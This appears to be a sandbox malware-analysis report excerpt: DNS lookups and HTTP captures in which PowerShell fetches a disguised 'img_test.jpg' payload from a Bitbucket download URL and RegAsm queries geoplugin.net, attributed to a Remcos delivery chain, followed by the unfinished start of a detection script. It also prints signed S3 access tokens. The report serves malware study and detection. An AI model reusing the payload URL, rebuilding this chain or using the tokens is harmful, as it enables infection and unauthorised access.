Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             52.217.168.193   A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             52.217.191.17    A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:16.541230917 CEST  1.1.1.1    192.168.2.6  0xe91f    No error (0)  s3-w.us-east-1.amazonaws.com      -                             3.5.25.191       A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:21.828881979 CEST  1.1.1.1    192.168.2.6  0x4bd2    No error (0)  raw.githubusercontent.com         -                             185.199.108.133  A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:21.828881979 CEST  1.1.1.1    192.168.2.6  0x4bd2    No error (0)  raw.githubusercontent.com         -                             185.199.109.133  A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:21.828881979 CEST  1.1.1.1    192.168.2.6  0x4bd2    No error (0)  raw.githubusercontent.com         -                             185.199.110.133  A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:21.828881979 CEST  1.1.1.1    192.168.2.6  0x4bd2    No error (0)  raw.githubusercontent.com         -                             185.199.111.133  A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:24.945240021 CEST  1.1.1.1    192.168.2.6  0xd8c1    No error (0)  geoplugin.net                     -                             178.237.33.50    A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:33.423366070 CEST  1.1.1.1    192.168.2.6  0xe1fc    No error (0)  g-bing-com.ax-0001.ax-msedge.net  ax-0001.ax-msedge.net         -                CNAME (Canonical name)  IN (0x0001)  false
Oct 21, 2024 17:05:33.423366070 CEST  1.1.1.1    192.168.2.6  0xe1fc    No error (0)  ax-0001.ax-msedge.net             -                             150.171.28.10    A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:05:33.423366070 CEST  1.1.1.1    192.168.2.6  0xe1fc    No error (0)  ax-0001.ax-msedge.net             -                             150.171.27.10    A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:06:05.676620007 CEST  1.1.1.1    192.168.2.6  0xa857    No error (0)  bg.microsoft.map.fastly.net       -                             199.232.214.172  A (IP address)          IN (0x0001)  false
Oct 21, 2024 17:06:05.676620007 CEST  1.1.1.1    192.168.2.6  0xa857    No error (0)  bg.microsoft.map.fastly.net       -                             199.232.210.172  A (IP address)          IN (0x0001)  false
                                                                                            • bitbucket.org
                                                                                            • bbuseruploads.s3.amazonaws.com
                                                                                            • raw.githubusercontent.com
                                                                                            • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49812 | 178.237.33.50 | 80 | 7436 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:05:24.965724945 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                            Host: geoplugin.net
                                                                                            Cache-Control: no-cache
Oct 21, 2024 17:05:25.552651882 CEST | 1168 | IN | HTTP/1.1 200 OK
                                                                                            date: Mon, 21 Oct 2024 15:05:25 GMT
                                                                                            server: Apache
                                                                                            content-length: 960
                                                                                            content-type: application/json; charset=utf-8
                                                                                            cache-control: public, max-age=300
                                                                                            access-control-allow-origin: *
                                                                                            Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 32 31 36 2e 35 32 2e 31 38 33 2e 31 35 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                                                                            Data Ascii: { "geoplugin_request":"216.52.183.150", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7157", "geoplugin_longitude":"-74", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49758 | 185.166.143.48 | 443 | 1812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 15:05:16 UTC | 110 | OUT | GET /adssgfdsg/testing/downloads/img_test.jpg?144417 HTTP/1.1
                                                                                            Host: bitbucket.org
                                                                                            Connection: Keep-Alive
2024-10-21 15:05:16 UTC | 5162 | IN | HTTP/1.1 302 Found
                                                                                            Date: Mon, 21 Oct 2024 15:05:16 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Content-Length: 0
                                                                                            Server: AtlassianEdge
                                                                                            Location: https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL [TRUNCATED]
                                                                                            Expires: Mon, 21 Oct 2024 15:05:16 GMT
                                                                                            Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                            X-Used-Mesh: False
                                                                                            Vary: Accept-Language, Origin
                                                                                            Content-Language: en
                                                                                            X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                            X-Dc-Location: Micros-3
                                                                                            X-Served-By: 88505e7b3e88
                                                                                            X-Version: b021f2266265
                                                                                            X-Static-Version: b021f2266265
                                                                                            X-Request-Count: 3894
                                                                                            X-Render-Time: 0.049344778060913086
                                                                                            X-B3-Traceid: ca5afaae37dc4bb7b40e674d637e8f69
                                                                                            X-B3-Spanid: e266b4c412124405
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Content-Security-Policy: object-src 'none'; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.p [TRUNCATED]
                                                                                            X-Usage-Quota-Remaining: 999168.756
                                                                                            X-Usage-Request-Cost: 848.70
                                                                                            X-Usage-User-Time: 0.023399
                                                                                            X-Usage-System-Time: 0.002062
                                                                                            X-Usage-Input-Ops: 0
                                                                                            X-Usage-Output-Ops: 0
                                                                                            Age: 0
                                                                                            X-Cache: MISS
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-Xss-Protection: 1; mode=block
                                                                                            Atl-Traceid: ca5afaae37dc4bb7b40e674d637e8f69
                                                                                            Atl-Request-Id: ca5afaae-37dc-4bb7-b40e-674d637e8f69
                                                                                            Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                            Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                            Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                            Server-Timing: atl-edge;dur=169,atl-edge-internal;dur=2,atl-edge-upstream;dur=168,atl-edge-pop;desc="aws-eu-central-1"
                                                                                            Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49764 | 52.217.161.16 | 443 | 1812 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-21 15:05:17 UTC | 1201 | OUT | GET /cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-4bf0-91bd-66321b83871e/img_test.jpg?response-content-disposition=attachment%3B%20filename%3D%22img_test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNO4DHE4VD&Signature=T6wewlQZbJQSKGkGpdqwpwnElD0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjECcaCXVzLWVhc3QtMSJHMEUCIHdpGFp%2BMWJdC40IhWJ3SSuh%2F3P9BfkWVJgGy%2F5d%2FxJrAiEA7cnRTAkYqS7IEoVvpfPhmiGIFqnW%2BTusWS1k%2B1LqRikqsAIIkP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDJ3hZc5H13DpsrVvSiqEAljj%2Feh582Kf2l0rpXwuMkBTuVn5fmjxN%2F1UiGutq1P4eK6JpawNdKFwSb8l%2FBnJ7U5ngONu60OLxfc6clZbFgjDwM4%2Binq%2BtGirnaPvueTnkbFKwYcig0YN%2BXANfigCXdSciOrBg%2BF8ITeQUmtEngmT7cfpw%2FcS7o0Ca21R7rEL4sAFd%2FQGP4LHIKW4I8PHOJS7KDTwFSdbyJh0ZlsbBUKsG6nqervFT%2BkQqDFEvcCT3UE%2Bgf5YOa2Imez9jOuySSc0y0JrDCQxV0VL5777zwENSg149ioqUwRzrSQZ5r4uHdbGlyudfflZEMvBEQk5PSM9xVer2lqAPOQ8TCemuoAB0naRMM%2Fa2bgGOp0BRtpiv1UEzqz9j23bqShE4p37bMiYIPCEIVvttSlSIWNWclxJdsdz%2FKRhdxCMY6AmnPnHOIwyQPueK%2BLYy%2FV5HlKlvGL7cX5kPi6DbUpaR6DWxL6p2AoqNVyGjtCQwiwBbff1ljX [TRUNCATED]
                                                                                            Host: bbuseruploads.s3.amazonaws.com
                                                                                            Connection: Keep-Alive
2024-10-21 15:05:17 UTC | 528 | IN | HTTP/1.1 200 OK
                                                                                            x-amz-id-2: e2Bzni8MLKlLXHUZbLuhB7fDFdaC4kaLH8LEcu6qzV1oN/PqPnNV2JfowYwEoND9Qjjxpol0x90=
                                                                                            x-amz-request-id: YCJBKQ12YH5YNCRS
                                                                                            Date: Mon, 21 Oct 2024 15:05:18 GMT
                                                                                            Last-Modified: Fri, 11 Oct 2024 19:32:10 GMT
                                                                                            ETag: "e0d39b0a0496243d533fe927251c3b32"
                                                                                            x-amz-server-side-encryption: AES256
                                                                                            x-amz-version-id: RXNouSsAldf7yiXikeGhYPApJ6wa7Pf9
                                                                                            Content-Disposition: attachment; filename="img_test.jpg"
                                                                                            Accept-Ranges: bytes
                                                                                            Content-Type: image/jpeg
                                                                                            Content-Length: 2578503
                                                                                            Server: AmazonS3
                                                                                            Connection: close
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff e1 00 16 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 00 00 00 00 00 ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 08 70 0f 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 5f 10 00 01 03 03 03 02 04 03 06 04 03 06 03 01 01 21 01
                                                                                            Data Ascii: JFIF,,ExifMM*CCp"_!
                                                                                            2024-10-21 15:05:17 UTC496INData Raw: c1 dc 0f e7 54 ac a7 04 aa 69 93 0d 3f c8 ef 4f ad ee 14 a4 41 54 fa 54 33 17 52 07 30 45 3a b7 b8 d8 48 93 3d e7 bd 54 9d 4c 96 32 c1 32 97 0a 76 9d c2 97 69 ed c9 24 1e 47 1f 5a 8a 45 cc ab 69 3e c0 f6 a5 db 7f 6f f5 4a 63 f5 a8 1c 19 2a 91 2a 9b 84 84 8f 9b 9e f1 e9 47 45 c4 a8 ca b8 f5 a8 d4 3a 95 81 07 bf 95 28 9b 9e 7e 6f c3 40 eb 13 91 22 ab 94 88 04 f6 ff 00 bf ca 8c 1f 49 50 83 51 ad dc c4 a8 11 1e 46 79 a3 0b a3 f8 89 24 9f 2a 1f 6d 8f bb 82 47 c4 e1 26 7b 8a 37 8d b8 f0 79 a8 c1 7c 79 98 03 b0 a1 6e f7 c3 59 25 44 f1 e9 4d ed 0d b8 93 37 02 48 04 11 41 f7 84 ef 1c 0a 8c 5d ee d3 09 30 26 8a e6 43 6f 3d 88 f4 34 5e d0 9c 91 2a 6e 40 02 48 04 fb d1 d1 76 15 b7 d3 91 de a1 55 7e 48 9f 33 e6 0f 7a f3 79 12 99 12 62 9d c1 f6 1f 71 3b f7 89 4f 04 49
                                                                                            Data Ascii: Ti?OATT3R0E:H=TL22vi$GZEi>oJc**GE:(~o@"IPQFy$*mG&{7y|ynY%DM7HA]0&Co=4^*n@HvU~H3zybq;OI
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 62 9d c2 67 91 3c 91 48 bc b0 15 f5 fc aa 68 f0 46 df 23 47 6d c1 31 1c 79 d3 77 6c c9 04 84 82 07 d6 9f 92 9f 69 34 57 1a 1c 1e 01 fe d5 34 5f 60 64 88 87 ed 3b c2 7b 53 0b ab 58 07 ca ac 0f 32 95 4f 6f 7e 62 a3 af 18 ef 1d fd cf 15 3d 72 e4 0f c3 20 6f 2d c2 d3 30 62 66 98 3a c0 4a 3b 76 f3 f7 a9 cb 9b 70 12 79 f3 a8 db 96 37 c8 e2 27 b5 68 d6 f2 56 9a c3 21 5e 4e c6 cc ff 00 51 e6 7c aa 36 f8 8d 84 81 ed 53 97 4c 77 33 26 a1 af 5b 25 11 3c 79 d6 85 65 79 a2 1e e9 3b 90 4c 8e de 74 d2 e1 29 09 3c 77 f3 fd 69 e5 c3 65 b4 a8 a8 92 0f 26 91 79 92 e0 90 a8 06 af d7 d8 89 ac 11 8f 28 6c 51 1b b9 ee 29 a1 b4 5f f5 02 41 e4 54 bb 76 61 42 09 04 7f 7a 7b 69 8f 48 db 25 20 0a b2 9a 5d c8 99 59 76 c9 40 13 b1 62 3d e8 19 68 02 ad a7 f0 c8 3c d5 9b 28 c2 0b 0a 03
                                                                                            Data Ascii: bg<HhF#Gm1ywli4W4_`d;{SX2Oo~b=r o-0bf:J;vpy7'hV!^NQ|6SLw3&[%<yey;Lt)<wie&y(lQ)_ATvaBz{iH% ]Yv@b=h<(
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: cf a9 af 25 2a 1c 73 e9 20 ff 00 d2 9d 86 a4 91 46 16 fc 79 50 3c 04 33 29 f9 80 32 00 33 34 74 b6 12 15 c8 3e a6 97 36 d0 9f 2e 28 a1 9d 9c 71 42 20 a1 21 40 1f 2e f1 47 09 dc 98 8f 61 22 8c db 70 9e e3 f5 8a 10 92 7e b3 eb 4c e4 23 c1 30 9e 4f 68 a1 29 e4 0e 6b ca 44 01 04 98 a3 26 4a 79 a0 11 e6 e4 0f 5e 69 44 a8 1f 59 a4 c0 09 24 09 e0 d1 d1 04 91 ef 48 40 4f 3c 73 f9 d2 89 51 db c1 ef de 8a e2 60 48 e2 2b c8 04 45 36 07 4f 02 ed ae 55 f4 e6 96 49 f9 92 20 c0 a6 c9 ee 79 13 f5 a5 10 a3 b8 73 42 d0 6b 91 cb 44 19 20 cf bd 2c 14 09 13 de 78 e7 b5 20 98 da 63 ca 95 6d 13 c1 34 c2 16 6f 95 8f 58 a3 b7 09 4a 7b f2 7c a8 8d 88 5f d3 8a 3b 49 07 d3 83 eb ff 00 4a 42 14 09 2a 00 cc 7b 45 18 af 68 f3 a4 d2 bd a4 09 11 5e 52 e5 5e dd fd 28 5c 44 2a 85 ef 3d 88
                                                                                            Data Ascii: %*s FyP<3)234t>6.(qB !@.Ga"p~L#0Oh)kD&Jy^iDY$H@O<sQ`H+E6OUI ysBkD ,x cm4oXJ{|_;IJB*{Eh^R^(\D*=
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: b6 09 20 81 13 f9 52 0e b0 09 91 c0 a7 ea 40 e0 1e 23 ce 93 53 21 52 0f 34 59 02 44 50 b6 f9 a3 9e 0f e5 47 4d b8 24 48 e7 eb 4f 4b 07 71 ec 09 a0 28 90 20 4c 7b c4 d2 18 6b f7 30 ea 78 04 79 51 c5 80 6c 73 27 8a 72 94 14 f3 db f3 99 af 05 85 a6 7c c0 ed 48 44 65 c5 a2 67 b1 3c 52 05 a2 83 d8 c5 48 3e 9d c4 f2 3b 7d 29 ba d3 00 82 49 fc e9 09 8d 95 00 f6 23 ea 6b ce a4 28 77 99 a3 a9 1f 5f d6 88 78 49 11 e7 fa d2 10 dd 7d a7 cf 9a 41 d4 8f 08 fe bf 4a 70 a4 f1 c0 e4 52 2f 0f 95 5f 48 a3 4c 44 7b e8 96 cf 62 7b 71 48 3e 37 03 e5 da 9d 5d 00 11 de 27 bd 36 70 05 13 e8 2a c2 ec 21 15 00 b0 79 f5 a3 25 24 c4 71 c7 f9 50 38 02 07 1c c5 1a 78 91 1c d3 88 49 48 94 19 e0 2a 8a b4 0d c0 73 26 97 58 84 10 3c bf 3a 05 34 41 99 14 e9 89 8c d6 d0 12 76 9e 45 20 a4 6d
                                                                                            Data Ascii: R@#S!R4YDPGM$HOKq( L{k0xyQls'r|HDeg<RH>;})I#k(w_xI}AJpR/_HLD{b{qH>7]'6p*!y%$qP8xIH*s&X<:4AvE m
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: c0 e3 d6 9a be df 87 e9 1e 67 9a 74 c2 c0 c9 4d 27 72 8c f3 eb 49 a9 20 7f 6e 29 67 cf cc 7b 08 30 39 34 94 05 28 84 88 54 f7 a2 dc 84 14 27 77 ca 38 fe f4 bb 2d 6f fe f3 45 4a 42 e4 47 24 fe b4 f6 c5 a4 a0 6d ed fe 74 2d e4 1d a2 6c d9 95 98 3d 89 f5 a1 72 d4 a5 45 21 40 0a 7a c3 61 30 69 2b 84 ca 8f 7e 3b 53 0b 03 07 59 e0 95 1e df 9f e7 4c 2e 5b 95 14 ce e9 f5 e2 2a 51 fe 53 00 03 03 cf 8a 65 70 80 b5 02 40 e6 8d 76 04 8d 75 90 90 00 3b 8f e9 34 91 62 42 8e e5 03 e8 3b 53 97 92 01 ec 24 73 de 91 dc 12 a2 3b 95 54 91 62 08 86 7e 43 bb e6 f3 e0 40 14 a1 b4 1b 01 2a 30 28 02 c0 73 68 51 88 8a 5c 10 a4 94 c8 26 3c fc a9 c4 34 bb 6c 6e e0 98 02 22 78 9a 6c 10 01 e6 7d 27 d7 de a4 6e 59 33 dc 76 9a 6e 94 10 8d d1 cc 13 f5 a4 21 1f 08 6d 24 93 41 e6 66 79 32
                                                                                            Data Ascii: gtM'rI n)g{094(T'w8-oEJBG$mt-l=rE!@za0i+~;SYL.[*QSep@vu;4bB;S$s;Tb~C@*0(shQ\&<4ln"xl}'nY3vn!m$Afy2
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 17 cf cc a1 dc c9 f3 a7 0f 12 04 4c ff 00 df 6a 68 ec 25 64 f3 1c 71 52 44 42 7b 47 97 11 ef 45 56 d4 9f 96 49 ef 1c d1 c2 41 49 12 7b 91 cd 24 b8 f1 08 fd 68 84 79 6e ca 4a 44 c8 a0 51 95 09 8e 3d e9 3f 0c 15 13 27 9f 20 66 84 ca 12 4c 99 3e b4 84 14 ae 07 1f de 8b 07 76 d2 3b 73 42 44 48 f5 e7 e9 42 9e 14 7e 94 b0 33 78 09 cc fe 54 05 2a 88 03 98 8e f4 22 27 cf 9a f2 ce e0 79 20 9e 28 d4 70 3a 60 a4 90 04 81 5e 81 e7 44 5a b6 83 c9 e2 82 67 d3 f5 a5 81 06 50 49 e4 83 f5 a0 08 04 cc 71 45 0e 4a bd 04 fa d1 b7 70 0d 2c 08 02 98 58 88 89 f3 a2 94 18 24 10 27 f3 af 17 07 ac cf bd 15 6e c2 80 81 cf bd 38 81 91 33 da 80 91 27 9e 3e b4 99 30 a3 fe b4 42 61 27 93 cf bd 26 46 28 57 f3 c4 cf 7a 4c ac 89 e6 bc a5 49 3e 50 68 85 30 08 93 cd 21 06 82 91 e5 fa d7 a3
                                                                                            Data Ascii: Ljh%dqRDB{GEVIAI{$hynJDQ=?' fL>v;sBDHB~3xT*"'y (p:`^DZgPIqEJp,X$'n83'>0Ba'&F(WzLI>Ph0!
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: af 91 02 b5 fc be f4 9a 95 27 88 8e f4 2a 3c 79 72 45 01 40 31 b4 f0 93 06 88 42 47 92 44 8f ce 81 ce 3b 9f 2e 68 f0 50 54 7b c8 a0 5a 77 03 cf 7a 42 1b 2e 12 af f4 a2 b8 bd 93 1c 8f 4f 4a 33 dc 18 fc 8d 37 74 f1 c7 02 90 d2 78 59 0e b7 41 3c 28 f7 8a 3b 6b 23 b9 ef 4d 90 8d a4 c4 fe bd e8 e9 57 f3 12 38 03 db b1 a4 03 1c 29 60 19 24 76 f5 a4 8c 17 07 62 07 34 45 2c ef 3d e4 f9 7a d0 ee 30 44 ab 91 48 47 d0 db a7 d2 08 1d c5 34 79 f4 a8 fa 0f 6a 65 7b 93 88 85 77 e6 98 bb 92 0a e4 a8 19 ac 08 c7 26 c6 47 77 ce c2 b8 fd 3b 8a 86 bf d8 fc 83 13 e5 eb 43 71 93 f9 c9 26 66 a3 6e af 81 dc 67 e6 1e bf fb 2a cd 71 69 91 cd a2 2b 54 d8 a5 0c 12 00 ec 79 f4 ac 3f 5a 6a 6b 9d 3f 72 e2 96 b0 a4 85 10 39 e2 2b 71 c8 e4 83 d6 8b 0b 48 24 f0 0d 66 3a bf 4e da 5d dc 15
                                                                                            Data Ascii: '*<yrE@1BGD;.hPT{ZwzB.OJ37txYA<(;k#MW8)`$vb4E,=z0DHG4yje{w&Gw;Cq&fng*qi+Ty?Zjk?r9+qH$f:N]
                                                                                            2024-10-21 15:05:17 UTC16384INData Raw: 78 03 cc cd 19 24 13 c1 11 f4 ef 48 7c e4 32 92 08 13 06 82 78 9f 4f 7e f5 e5 9e 38 a0 00 24 09 3f 58 a5 80 5b 3c 60 9e d4 29 30 7d 4c 7a d7 88 82 20 2b 83 5e ef 10 3e 6a 4d 30 77 60 51 b5 94 c0 3c 7b 8a 70 cb e3 71 ef 27 d7 b0 a6 4d ab 84 cc 11 3c 4d 28 85 03 31 f2 d0 3a d3 09 5b 81 fb 77 12 3b f7 e6 66 9c 37 77 b4 82 4c 9f 23 3d ea 30 2e 13 dc 92 79 f6 a7 16 ee 84 93 c8 90 26 6a 29 56 8b 10 bb 82 6d 8c b7 f2 80 93 c7 30 29 64 e6 07 32 a5 27 70 9e dd aa 19 0e 83 22 47 14 64 dc 04 80 38 04 71 de a1 54 a2 75 6b c1 2e 8b dd d3 ea 7d 7c e9 ad cb 7e 21 3b 54 41 1c 53 2f 18 88 3b 8c 13 f4 a3 7d ed 5c 73 c7 bd 1a ad 21 9d b9 15 5b 61 11 27 74 f6 a4 ca 42 89 e4 f1 da 83 c5 0e ff 00 50 3b 7d 3c ab ca 70 03 c1 10 3d 3b d4 89 7c 00 a4 08 40 01 44 99 1f de 81 c4 87
                                                                                            Data Ascii: x$H|2xO~8$?X[<`)0}Lz +^>jM0w`Q<{pq'M<M(1:[w;f7wL#=0.y&j)Vm0)d2'p"Gd8qTuk.}|~!;TAS/;}\s![a'tBP;}<p=;|@D
                                                                                            2024-10-21 15:05:17 UTC1024INData Raw: 8e fe 43 bd 09 68 f6 83 df d2 29 c9 6a 62 38 db de 83 ee c0 76 f4 a4 f9 1b 03 7d a1 24 00 7b 8e 24 76 a0 0b f9 48 23 ce 38 34 e1 56 ff 00 2f af 91 fa 51 3e eb f3 4f 68 e7 de 9b 00 05 42 4a 08 57 22 3c a8 c9 7e 3f 2a 14 b6 08 90 67 ca 0d 18 a3 60 32 00 03 b1 f3 a0 94 51 24 6c 68 32 0c 12 49 90 69 54 bc 40 20 13 ff 00 7e 54 90 41 4c c8 ef 46 4b 22 49 9e f5 1b af 24 8a c7 9c 8e 51 78 a0 81 d8 45 2e cd da 52 66 7b fb d4 70 65 3b 84 19 23 9e 29 62 da 77 03 cc cf 98 a1 75 2f 04 b0 b4 78 f5 ca 96 ef ca 4f 1d f9 8a 56 de ff 00 6a 86 f9 da 7c a9 8e f5 26 13 c7 1c f7 e2 85 2a 83 b8 f7 1d aa 19 54 4f 1b 5e 4b 06 32 f1 0a 5a 41 13 06 2a 71 a7 99 71 b4 f7 10 3f 4a a7 a2 e0 44 ee 82 79 a7 b6 d7 8b 6d 20 ee 93 33 dc d5 79 e9 d3 2c 43 51 c7 25 8d 60 4c 81 20 8e 0d 24 e2
                                                                                            Data Ascii: Ch)jb8v}${$vH#84V/Q>OhBJW"<~?*g`2Q$lh2IiT@ ~TALFK"I$QxE.Rf{pe;#)bwu/xOVj|&*TO^K2ZA*qq?JDym 3y,CQ%`L $
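The HTTP sessions in this report (the RegAsm.exe lookup of geoplugin.net above, the two PowerShell downloads of img_test.jpg via bitbucket.org and S3, and the raw.githubusercontent.com fetch that follows below) carry the traits an analyst would key on when turning a sandbox run into detection logic. The script below is an added example, not part of the Joe Sandbox output: it transcribes those four sessions as constructed input (headers trimmed to the ones inspected, the signed S3 query string omitted) and runs a small set of triage heuristics over them. The host lists, size thresholds and wording of the findings are the editor's assumptions, intended to be tuned before use on production telemetry.

```python
"""Triage of the HTTP sessions recorded in this report (added example).

SESSIONS is transcribed from the report's own session tables; the heuristics
and host lists are assumptions chosen to match what this Remcos delivery
chain looks like on the wire.
"""
from __future__ import annotations

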